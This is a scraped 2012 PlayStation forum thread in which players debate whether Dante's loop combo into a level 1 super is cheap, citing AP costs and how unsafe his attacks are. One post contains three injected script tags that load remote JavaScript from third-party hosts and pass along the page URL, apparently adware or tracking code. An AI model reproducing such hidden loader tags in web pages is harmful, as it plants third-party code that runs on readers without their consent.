Gaming Beast
2167 posts

Re: Dante´s infinite combo. Cheap or legit?

Dec 4, 2012
"This game isnt who can pull off great combos but who can kill with Supers. So characters like Sir Dan, Raiden, Dante, Both Coles (that I know of) are way ahead of the pack when it comes to this stuff as they have certain kill supers i.e. nothing you can do when getting hit by a certain attack. "

QFT!

But yeah, you can add Big Daddy, FP, Spike (I believe?), Drake, Jak, Heihachi, Parrappa and probably quite a few others to that list.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 21 of 65 (468 Views)
0 Likes
Gaming Beast
1746 posts

Dec 4, 2012

Dante's not ahead of anyone for a combo-able level 1. It's so difficult you're only going to see it in top level play. I'd say 10% or less Dante's players will even be good enough to do an empty cancel so consistently that's they'll even bother doing it.

Seriously you guys, if you've never played Dante and tried to do this yourself, don't blindly complain how cheap it is. It's the only useful thing he's got going for him for 1v1s since his level 2 is pretty hard to hit confirm in a 1v1 situation since he either has to parry or get off a pretty slow attack. 

Message 22 of 65 (465 Views)
0 Likes
Lombax Warrior
103 posts

Dec 4, 2012

Nearly the entire cast has juggles that result in a full level 1. Nearly the entire cast has ways to combo into level 1's.

Get over it, or just play with people who suck at the game.

Message 23 of 65 (459 Views)
Wastelander
561 posts

Dec 4, 2012

For those of you still complaining bout Dante, go into training mode and start swinging sword attacks (square button) without hitting anything. Then hold block. Tell me how long in takes for Dante to go into his block animation then come back and tell me Dante doesn't absolutely NEED these loops. Dante has more ending lag on all of his attacks than any other character in the game. Dante gets punished from missed attacks (whiffs) harder than anyone else. You take this away from Dante, and you will have completely destroyed the only thing Dante is good at. This is, quite literily, the only thing that makes Dante viable and even then he is just an inferior version of Raiden.

Message 24 of 65 (447 Views)
0 Likes
Sackboy
517 posts

Dec 4, 2012

Raffymundo wrote:

its not cheap because dante is the most unsafe character in the game also its very difficult to pull of

Correction.  Sir Dan is THE most unsafe character in the game. 

Message 25 of 65 (444 Views)
0 Likes
Sackboy
517 posts

Dec 4, 2012

BomB-RideR-14 wrote:

For those of you still complaining bout Dante, go into training mode and start swinging sword attacks (square button) without hitting anything. Then hold block. Tell me how long in takes for Dante to go into his block animation then come back and tell me Dante doesn't absolutely NEED these loops. Dante has more ending lag on all of his attacks than any other character in the game. Dante gets punished from missed attacks (whiffs) harder than anyone else. You take this away from Dante, and you will have completely destroyed the only thing Dante is good at. This is, quite literily, the only thing that makes Dante viable and even then he is just an inferior version of Raiden.

While it might be true that there are other characters that can hit-confirm into a super, how many others are there that can build a full meter from a loop and then decided when to super his opponent?  So far, only Dante.  I have not seen another character that can build a whole bar from a loop combo that is then safe to super into. 

Message 26 of 65 (441 Views)
0 Likes
Wastelander
561 posts

[ Edited ]
Dec 4, 2012

stelmoslight wrote:

BomB-RideR-14 wrote:

While it might be true that there are other characters that can hit-confirm into a super, how many others are there that can build a full meter from a loop and then decided when to super his opponent?  So far, only Dante.  I have not seen another character that can build a whole bar from a loop combo that is then safe to super into. 

Raiden.

Also, like I said, no other character has Dante's unsafe strings. You take away Dante's loops, you've just completely destroyed the entire purpose of the character. Dante is High Risk, High Reward. Every time you press a button, you will either hit and score a kill or you will miss or have your attack blocked and you will die.

Until you've played Dante, you truly have no idea how hard it is to play him and how unsafe his attacks are. His ability to generate a combo into a super is justified by how risky he is to use.

Btw, Dante's super costs 150 AP, and you can only generate up to 90 AP before killing. So "building a whole bar then comboing into super" is an inaccurate statement. Dante's supers are useless outside of combos (slow).

Message 27 of 65 (438 Views)
0 Likes
Sackboy
517 posts

Dec 4, 2012

Yes, but in a 1 v 1 situation, this is basically saying that once he has got you into this combo, he can keep going until he has built up a lvl 1, 2, or 3  (unless he drops it) and there's not a dang thing you can do about it.  I'm sorry, but that's not acceptable. 

Message 28 of 65 (432 Views)
0 Likes
Wastelander
561 posts

Dec 4, 2012

stelmoslight wrote:

Yes, but in a 1 v 1 situation, this is basically saying that once he has got you into this combo, he can keep going until he has built up a lvl 1, 2, or 3  (unless he drops it) and there's not a dang thing you can do about it.  I'm sorry, but that's not acceptable. 

I'm sorry but you are completely wrong about this. Please get your facts straight. This is NOT an infinite. You can only build up to 150 AP with this loop (180 AP with precise gun cancels, but I can't do that...you truly need to be an execution master to pull that off consistently).

Dante's Supers are among the most expensive in the game.

Level 1: 150 AP

Level 2: 400 AP

Level 3: 750 AP

Please explain to me how he can build up to 750 AP from a single combo that he can "keep going until" he gets to his level 3. There is an infinite prevention system that makes what you said completely impossible.

Message 29 of 65 (428 Views)
Sackboy
517 posts

Dec 4, 2012

BomB-RideR-14 wrote:

stelmoslight wrote:

I'm sorry but you are completely wrong about this. Please get your facts straight. This is NOT an infinite. You can only build up to 150 AP with this loop (180 AP with precise gun cancels, but I can't do that...you truly need to be an execution master to pull that off consistently).

Dante's Supers are among the most expensive in the game.

Level 1: 150 AP

Level 2: 400 AP

Level 3: 750 AP

Please explain to me how he can build up to 750 AP from a single combo that he can "keep going until" he gets to his level 3. There is an infinite prevention system that makes what you said completely impossible.

The point is that this is a means by which you can be trapped with no way out while Dante farms AP off of you until he can kill you.  Are you saying that characters should be allowed to simply hit you once and then keep you in a combo until that character can kill you?  Then every person using this character will learn to do this and only this and then what happens?  it becomes no fun for anyone because 90% of the battle, they are stuck in a combo that guarantees a kill at the end.  Let me ask you, is it fun for you to be trapped in another Dante's loop while you sit there and can do nothing about it unil you die?  That's a fair question, I think.  And you shouldn't complain.  I play Jak.  Jak has almost no combos and gains very little AP for the risks he takes.  And, as far as I have discovered, he can't combo into ANY of his supers. 

Message 30 of 65 (425 Views)
0 Likes